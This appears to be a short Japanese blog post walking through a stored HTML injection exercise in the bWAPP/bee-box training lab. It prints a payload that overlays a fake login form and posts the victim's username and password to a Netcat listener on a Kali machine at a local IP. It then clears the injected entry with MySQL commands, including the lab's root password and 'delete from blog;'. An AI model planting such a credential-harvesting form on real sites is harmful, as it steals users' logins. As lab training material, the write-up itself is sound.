Hello there, ('ω')ノ

 

以前にHTML Injection - Stored (Blog)はやったのですが。

悪意のあるログインフォームを配置することに。

 

 

さきに別途、仮想マシンのKali LinuxのIPアドレスを確認しておいて。

Netcatでリスナーを起動しておいて。

 

 

下記のコードをsubmitして。

<div class="test_code">test</div>
<div style="position: absolute; left: 120px; top: 100px; width: 300px; height: 50px; z-index: 1000; background-color:white;">
Please Login:
<form name="login" action="http://192.168.0.49:1234/hacked.html" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="username"/></td>
<td>Password:</td>
<td><input type="password" name="passwd"/></td>
<td><input type="submit" value="Login"/></td>
</tr>
</table>
</form></div>

 

すると、ログインフォームが表示されて。

 

 

ユーザ名とパスワードを入力してログインボタンを押すと。

 

 

Kali Linuxへ送信されて。

 

 

このままだと悪意のコードが保存されたままなので。

Bee-BoxでDBを編集することに。

その前にキーボードを日本語仕様に変更して。

　setxkbmap jp

 

 

まずは、MYSQLのコマンドツールを起動して。

　mysql -u root -p

　パスワード：bug

 

 

データベースの確認と選択をして、テーブルの確認を。

　show databases;

　use bWAPP;

　show tables;

 

 

blogの内容を確認するとさきほどのコードが表示されて。

　select * from blog;

 

 

blogの内容を削除して。

　delete from blog;

 

 

Best regards, (^^ゞ